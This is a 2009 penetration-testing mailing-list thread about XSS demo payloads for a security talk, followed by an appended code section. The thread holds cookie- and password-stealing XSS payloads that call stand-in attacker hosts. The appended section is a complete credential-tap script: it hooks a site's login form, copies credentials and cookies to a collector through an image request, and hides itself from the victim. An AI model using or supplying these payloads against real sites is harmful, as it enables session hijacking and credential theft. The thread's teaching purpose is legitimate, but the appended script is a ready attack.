Sorry for being late to the party, but a good one I did was to use XSS
in a search results page to re-write it to look exactly the same as
the login page. It even posted to the real login page, so it left the user
logged in, but before doing that it sent me a copy of the details, I
think through an image request. As the search page could be hit
through HTTPS as well as HTTP, my login page looked very authentic.

Robin

2009/5/29 Adrian Crenshaw <[email protected]>:
> It won't be held online, but I plan to record and post it. Thanks for all
> of the ideas, guys.
>
> Adrian
>
> On Fri, May 29, 2009 at 9:54 AM, packetjack <[email protected]> wrote:
>>
>> Sounds like a sweet presentation you're giving, Adrian. I agree,
>> the <script>alert("XSS");</script> is so boring. Kudos to you for making an
>> interesting presentation!
>> Is this an online presentation?  I'd love to see it if so!  I test webapps
>> and often can prove a site is vuln due to the example given above, but I
>> would like to learn some of the ways you and others mentioned, ones that
>> will show upper mgt what this "little vuln" is capable of.....
>> Mary
>>
>> On Fri, May 29, 2009 at 7:45 AM, Michael Douglas <[email protected]>
>> wrote:
>>>
>>> While all these samples are really fun, I've lately had great luck by
>>> making two different XSS attacks when I'm showing folks.
>>>
>>> One for the devs -- this tends to be a bit more "fun" and does stuff
>>> like click trapping.
>>>
>>> For marketing or the project managers -- the ones I've found most
>>> likely to sweep these bugs under the rug -- I send them "brand damage"
>>> examples.  (Cock ring size is freaking hilarious, but would send me to
>>> HR).  So I do things like image swapping, or setting the background to
>>> a LOLCat or a competitor logo.
>>>
>>> The all time XSS FTW moment was about 4 years ago now, when someone
>>> found an XSS problem on a McDonald's site. Their link was so damn
>>> sweet, it's what got me interested in web app security. When you
>>> clicked it, you were sent to a page that had all the McD's wrappings but
>>> the content section of the window was blank except for in lovely red
>>> letters it said: "Hey FATTIE! You really shouldn't be eating our
>>> food!"
>>>
>>>
>>>
>>> On Fri, May 29, 2009 at 3:35 AM,  <[email protected]> wrote:
>>> > You could use a couple of typical password/cookie stealing examples.
>>> >
>>> > Cookie stealing iframe.:
>>> > "><IFRAME SRC="javascript:window.location=%22http://evilserver.com/evil.php?stuff=%22+document.cookie" height="1" width="1" frameborder="0"></IFRAME>
>>> >
>>> > Altering the logon form.:
>>> > "><script>window.onload = function(){ document.loginForm.action='http://evilserver.com/evil.php?details='; }</script><!--
>>> >
>>> > I like to use the logon form example for my penetration testing
>>> > presentations as it looks 100% normal to the user, except it redirects the
>>> > Submit button to send the logon information (username/password in most
>>> > cases) to your evilserver instead of the real server. You can also rewrite
>>> > the code in the user's browser to remove password hashing to make it easier
>>> > to get the clear text password. On the server end I usually just put up a
>>> > Metasploit HTTP or a netcat listener on the evilserver.com address to output
>>> > the traffic to a logfile. You can also log it to a database for mass farming
>>> > of data, but we don't do that kind of thing, we leave that to Bob ;)
>>> >
>>> > If you want something evil on the client-side, try an iframe that references
>>> > a PDF file. You can then export a PDF from Metasploit and embed the
>>> > Meterpreter payload for total world domination.
>>> >
>>> > Chris John Riley
>>> >
>>> > [email protected]@inet wrote on 28.05.2009
>>> > 20:50:39:
>>> >
>>> >> Ok, I've got yet another presentation coming up, this time on the OWASP
>>> >> Top 10 and Mutillidae. One of the things I'm going to cover is XSS. The
>>> >> canonical example of course is:
>>> >>
>>> >> <script>alert("XSS");</script>
>>> >>
>>> >> but that is boring, and gives folks the impression that XSS is not that
>>> >> serious. Better short examples would be:
>>> >>
>>> >> Redirect traffic to your site:
>>> >> <script>window.location = "http://www.irongeek.com/";</script>
>>> >>
>>> >> A little cookie Grabbing:
>>> >> <script>
>>> >> new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURIComponent(document.cookie);
>>> >> </script>
>>> >>
>>> >> Or maybe a password form to make people think they have to login, but it
>>> >> just grabs the credentials:
>>> >> <script>
>>> >> username=prompt('Please enter your username',' ');
>>> >> password=prompt('Please enter your password',' ');
>>> >> document.write("<img src=\"http://attacker.hak/catch.php?username="+encodeURIComponent(username)+"&password="+encodeURIComponent(password)+"\">");
>>> >> </script>
>>> >>
>>> >> What are other cool things to inject, besides maybe BeEF, that show off how
>>> >> XSS can be a big deal?
>>> >>
>>> >> Thanks,
>>> >> Adrian
>>> >> _______________________________________________
>>> >> Pauldotcom mailing list
>>> >> [email protected]
>>> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>>> >> Main Web Site: http://pauldotcom.com
>>> > ----------------------------------------
>>> > Raiffeisen Informatik GmbH, Firmenbuchnr. 88239p, Handelsgericht Wien, DVR
>>> > 0486809, UID ATU 16351908
>>> >
>>> > Correspondence with above mentioned sender via e-mail is only for
>>> > information purposes. This medium may not be used for exchange of
>>> > legally-binding communications.
>>> > ----------------------------------------
>>> >
>>> >
>>> >
>>
>>
>
>
>
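The credential tap that Robin and Chris John Riley describe in the thread, written out as a working page script. This is an added example, not code posted by anyone on the list: it leaves the site's own login form (`document.loginForm`, the name Chris's payload assumes) posting to the real handler, so the victim ends up logged in as normal, but first copies the submitted fields plus `document.cookie` to a collector through an `<img>` request. The collector URL `https://collector.example/catch`, the `tap.js` file name and the field names used in the check are all assumptions.

```javascript
// Added example (not from the thread). Assumed collector URL; in the attack
// this script is served from the collector and loaded by the injected tag.
const COLLECTOR = "https://collector.example/catch";

// Build the beacon URL. encodeURIComponent, not encodeURI, so that '&', '=',
// ';' and '+' inside a password or cookie survive as query-string values.
function buildBeaconUrl(collector, fields) {
  const pairs = Object.keys(fields).map(
    (k) => encodeURIComponent(k) + "=" + encodeURIComponent(fields[k])
  );
  return collector + (collector.includes("?") ? "&" : "?") + pairs.join("&");
}

// Copy every named control of a form into a plain object. Hidden inputs are
// included on purpose: that picks up CSRF tokens along with the credentials.
function collectFields(form) {
  const out = {};
  for (const el of form.elements) {
    if (el.name) out[el.name] = el.value;
  }
  return out;
}

// Hook the real login form. The window is passed in (instead of using the
// global) so the same function can be exercised outside a browser.
function installCredentialTap(win, collector) {
  const form = win.document.loginForm;
  if (!form) return false;
  form.addEventListener("submit", function (ev) {
    ev.preventDefault(); // hold the real submit until the beacon is on its way
    const fields = collectFields(form);
    fields.cookie = win.document.cookie;
    let released = false;
    const release = function () {
      if (!released) {
        released = true;
        form.submit(); // form.submit() does not re-fire this submit handler
      }
    };
    const beacon = new win.Image();
    beacon.onload = release;
    beacon.onerror = release; // a 404 from the collector still lets the login go through
    beacon.src = buildBeaconUrl(collector, fields);
    win.setTimeout(release, 1500); // never leave the victim with a dead Submit button
  });
  return true;
}

// Injected into the vulnerable page as:
//   "><script src="https://collector.example/tap.js"></script><!--
// where tap.js is this file; in a browser the next line arms the tap.
if (typeof window !== "undefined") installCredentialTap(window, COLLECTOR);
```

Because the beacon is a plain image GET, no same-origin or CORS check stands in its way, and the page's own submit goes through untouched, which is what makes the page look "100% normal" to the user. The timeout and the `onerror` hook matter in a demo: if the collector is down, the victim must still be logged in, or the broken Submit button gives the game away.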
